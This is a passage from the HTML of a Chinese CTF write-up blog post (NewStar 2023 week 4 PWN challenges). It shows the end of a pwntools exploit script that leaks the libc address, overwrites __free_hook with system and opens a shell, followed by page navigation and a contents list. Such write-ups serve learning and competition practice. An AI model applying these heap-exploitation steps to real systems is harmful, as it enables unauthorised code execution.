&#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">delete</span>(<span class="params">idx</span>):</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;Choice: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="string">b&#x27;3&#x27;</span>)</span><br><span class="line">    r.recvuntil(<span class="string">b&#x27;idx: &#x27;</span>)</span><br><span class="line">    r.sendline(<span class="built_in">str</span>(idx).encode())</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">0x18</span>)</span><br><span class="line">add(<span class="number">0x38</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>):</span><br><span class="line">    add(<span class="number">0x78</span>)</span><br><span class="line"></span><br><span class="line">delete(<span class="number">0</span>)</span><br><span class="line">add(<span class="number">0x18</span>, <span class="string">b&#x27;\x00&#x27;</span> * <span class="number">0x18</span> + p8(<span class="number">0x61</span>))</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x58</span>, p64(<span class="number">0xdeadbeef</span>)*<span class="number">3</span>+p64(<span class="number">0x441</span>))</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">add(<span class="number">0x38</span>)</span><br><span class="line"></span><br><span class="line">show(<span class="number">3</span>)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;content: \n&#x27;</span>)</span><br><span class="line"><span class="comment"># print(r.recvuntil(b&#x27;\x7f&#x27;))</span></span><br><span class="line">libc.address = u64(r.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>).ljust(<span class="number">8</span>, <span class="string">b&#x27;\x00&#x27;</span>)) - \</span><br><span class="line">    <span class="number">0x70</span> - libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">log.success(<span class="string">&#x27;libc_base: &#x27;</span> + <span class="built_in">hex</span>(libc.address))</span><br><span class="line"></span><br><span class="line">add(<span class="number">0x38</span>)</span><br><span class="line">delete(<span class="number">3</span>)</span><br><span class="line">delete(<span class="number">2</span>)</span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line">add(<span class="number">0x58</span>, flat(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0x41</span>, libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]))</span><br><span class="line">add(<span class="number">0x38</span>)</span><br><span class="line">add(<span class="number">0x38</span>, p64(libc.sym[<span class="string">&#x27;system&#x27;</span>]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(r)</span></span><br><span class="line"><span class="comment"># pause()</span></span><br><span class="line">delete(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


											<div class="article-footer-copyright">

    本博客采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" target="_blank">知识共享署名-非商业性使用-相同方式共享 4.0
        国际许可协议(CC BY-NC-SA 4.0) 发布.</a></br>
    因本人技术水平和知识面有限, 内容如有纰漏或者需要修正的地方, 欢迎大家指正。转载请注明来自<a href="https://c-lby.github.io" target="_blank">C_LBY's blog</a>！
</div>
							</div>

							
									
										<span data-path="/2024/03/01/2023newstar-week4-wp/">
											<em class="post-meta-item-text"> Page View <i
													class="waline-pageview-count"></i></em>
										</span>

										
											<div>
												<center>

													<div class="pagination">

    
    
    <a href="/2024/03/02/glibc-unsortedbin/" type="button" class="btn btn-default"><i
                class="fa fa-arrow-circle-o-left"></i> 上一页</a>
    

    <a href="/" type="button" class="btn btn-default"><i class="fa fa-home"></i>Home</a>
    
    <a href="/2024/02/17/tcache-attack/" type="button" class="btn btn-default ">下一页<i
                class="fa fa-arrow-circle-o-right"></i></a>
    

    
</div>


												</center>
											</div>

											<!-- comment -->
											<!--
<section id="comment">
    <h2 class="title">留言</h2>

    
</section>

-->
											
													
														<section id="comments" class="comments">
															<!-- <link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
  var walineConfig = 
    walineConfig.el='#waline';
  Waline.init(walineConfig);
</script> -->

<link rel="stylesheet" href="https://unpkg.com/@waline/client@v2/dist/waline.css" />
<div id="waline"></div>
<script type="module">
  import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

  init({
    enable: true,
    el: '#waline',
    serverURL: 'https://blog-s-comment-three.vercel.app',
    dark: true,
    pageview: true,
    lang: 'zh-CN',
    requiredMeta: ['nick', 'mail'],
    locale:
      { placeholder: 'Say something……' },
    highlighter: true,
    search: false,
    emoji: [
      '//unpkg.com/@waline/emojis@1.2.0/weibo',
      '//unpkg.com/@waline/emojis@1.2.0/bmoji',
      '//unpkg.com/@waline/emojis@1.2.0/bilibili',
      'https://unpkg.com/@waline/emojis@1.2.0/qq',
    ],
    imageUploader: false,
  });
</script>
														</section>
														
															
					</div> <!-- col-md-9/col-md-12 -->


					
						<div id="side_meta">
							<div class="col-md-3" id="post_meta"> 

	<!-- date -->
	
	<div class="meta-widget">
	<i class="fa fa-clock-o"></i>
	2024-03-01 
	</div>
	

	<!-- categories -->
    
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#categorys"><i class="fa fa-folder"></i></a>	
    <ul id="categorys" class="tag_box list-unstyled collapse in">
          
  <li>
    <li><a href="/categories/WP/">WP<span>8</span></a></li>
  </li>

    </ul>
	</div>
	

	<!-- tags -->
	
	<div class="meta-widget">
	<a data-toggle="collapse" data-target="#tags"><i class="fa fa-tags"></i></a>		  
    <ul id="tags" class="tag_box list-unstyled collapse in">	  
	    
  <li><a href="/tags/CTF/">CTF<span>10</span></a></li> <li><a href="/tags/PWN/">PWN<span>12</span></a></li> <li><a href="/tags/WP/">WP<span>8</span></a></li>
    </ul>
	</div>
		

	<!-- toc -->
	<div class="meta-widget">
	
	   <a data-toggle="collapse" data-target="#toc"><i class="fa fa-bars"></i></a>
	   <div id="toc" class="toc collapse in">
		   <span class="toc-title">Contents</span>
			<ol class="toc-article"><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x00-%E5%89%8D%E8%A8%80%EF%BC%88patchelf%E7%9A%84%E6%AD%A3%E7%A1%AE%E6%89%93%E5%BC%80%E6%96%B9%E5%BC%8F%EF%BC%89"><span class="toc-article-text">0x00 前言（patchelf的正确打开方式）</span></a></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x01-Double"><span class="toc-article-text">0x01 Double</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%88%86%E6%9E%90"><span class="toc-article-text">分析</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP%EF%BC%9A"><span class="toc-article-text">EXP：</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x02-game"><span class="toc-article-text">0x02 game</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E9%A2%98%E7%9B%AE"><span class="toc-article-text">题目</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="toc-article-text">漏洞利用</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x03-ezheap"><span class="toc-article-text">0x03 ezheap</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E7%BB%93%E6%9E%84%E4%BD%93%E7%9A%84%E6%81%A2%E5%A4%8D"><span class="toc-article-text">结构体的恢复</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#UAF%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8"><span class="toc-article-text">UAF漏洞的利用</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#libc%E5%9C%B0%E5%9D%80%E7%9A%84%E6%B3%84%E9%9C%B2"><span class="toc-article-text">libc地址的泄露</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%8A%AB%E6%8C%81-free-hook-getshell"><span class="toc-article-text">劫持__free_hook &amp; getshell</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP-1"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x04-message-board"><span class="toc-article-text">0x04 message_board</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E9%A2%98%E7%9B%AE-1"><span class="toc-article-text">题目</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%88%86%E6%9E%90-1"><span class="toc-article-text">分析</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#scanf%E6%97%A0%E8%BF%94%E5%9B%9E%E7%89%B9%E6%80%A7"><span class="toc-article-text">scanf无返回特性</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP-2"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li><li class="toc-article-item toc-article-level-3"><a class="toc-article-link" href="#0x05-god-of-change"><span class="toc-article-text">0x05 god_of_change</span></a><ol class="toc-article-child"><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E6%80%9D%E8%B7%AF"><span class="toc-article-text">思路</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%88%A9%E7%94%A8Unsortedbin%E6%B3%84%E9%9C%B2libc%E5%9C%B0%E5%9D%80"><span class="toc-article-text">利用Unsortedbin泄露libc地址</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#%E5%8A%A8%E8%B0%83%E5%88%86%E6%9E%90"><span class="toc-article-text">动调分析</span></a></li><li class="toc-article-item toc-article-level-5"><a class="toc-article-link" href="#EXP-3"><span class="toc-article-text">EXP</span></a></li></ol></li></ol></li></ol>
		</div>
	
	</div>
	
    <hr>
	
</div><!-- col-md-3 -->



						</div>

						

			</div><!-- row -->

			<!--
 -->
	</div>
  </div>
  <div class="container-narrow">
  <footer> <p>
  
    &copy; 2024
      鎏柏鱼's Blog
        
                powered by <a href="http://hexo.io/" target="_blank">Hexo</a> | Theme by <a
                  href="https://github.com/Ares-X/hexo-theme-freemind.bithack" target="_blank">freemind.bithack</a>
</p> </footer>
</div> <!-- container-narrow -->
  


  
<a id="gotop" href="#">   
  <span>⬆︎TOP</span>
</a>

<script src="/js/jquery.imagesloaded.min.js"></script>
<script src="/js/gallery.js"></script>
<script src="/js/bootstrap.min.js"></script>
<script src="/js/main.js"></script>
<script src="/js/search.js"></script> 


<link rel="stylesheet" href="/fancybox/jquery.fancybox.css" media="screen" type="text/css">
<script src="/fancybox/jquery.fancybox.pack.js"></script>
<script type="text/javascript">
(function($){
  $('.fancybox').fancybox();
})(jQuery);
</script>



   <script type="text/javascript">      
     var search_path = "search.xml";
	 if (search_path.length == 0) {
	 	search_path = "search.xml";
	 }
	 var path = "/" + search_path;
     searchFunc(path, 'local-search-input', 'local-search-result');
   </script>

</body>
   </html>
